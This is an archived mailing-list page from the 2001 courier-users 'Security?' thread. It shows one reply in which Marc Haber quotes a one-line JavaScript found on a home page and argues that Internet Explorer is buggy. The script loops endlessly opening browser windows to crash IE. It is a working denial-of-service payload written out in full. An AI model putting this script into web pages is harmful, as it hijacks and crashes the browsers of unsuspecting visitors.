17 messages in net.sourceforge.lists.courier-usersRe: [courier-users] Security?
FromSent OnAttachments
Robin S. SochaJan 14, 2001 8:09 am 
John WatsonJan 14, 2001 9:11 am 
Mike HorwathJan 14, 2001 9:21 am 
Tomas FasthJan 14, 2001 9:23 am 
John WatsonJan 14, 2001 9:26 am 
Daniel RoesenJan 14, 2001 10:21 am 
Momentum Online System AdministratorJan 14, 2001 10:27 am 
Robin S. SochaJan 14, 2001 11:06 am 
Robin S. SochaJan 14, 2001 11:13 am 
Lindsay HaisleyJan 14, 2001 1:24 pm 
Cindy SmithJan 14, 2001 1:54 pm 
Tomas FasthJan 14, 2001 2:47 pm 
Marc HaberJan 15, 2001 12:14 am 
Patrick PriceJan 15, 2001 1:01 am 
jarekJan 15, 2001 1:29 am 
Steve UnderwoodJan 15, 2001 8:19 am 
jhen...@bogon.comJan 15, 2001 12:01 pm 
Actions with this message:
Paste this link in email or IM:
Paste this link in email or IM:
Atom feed for this thread
Paste this URL into your reader:
Subject:Re: [courier-users] Security?Actions...
From:Marc Haber (cour@marc-haber.de)
Date:Jan 15, 2001 12:14:00 am
List:net.sourceforge.lists.courier-users

On Sun, 14 Jan 2001 13:28:14 -0500, Momentum Online System Administrator <sysa@moment.net> wrote:

Why is this code on your home page ?

Maybe to show that the Internet Explorer ist a buggy program that can be made to crash with

if(navigator.appName=="Microsoft Internet Explorer"){var x=new Date(),y=(x.getTime()%1000000)*100+37;while(1){ +y++;window.open("http://www.microsoft.com/","q"+y);}}

only three lines of JavaScript.

I'd be worried too about security when scripts like this are being written.

The real problems is software that blindly executes scripts and can be thrown off-track with malicious scripts.

Greetings Marc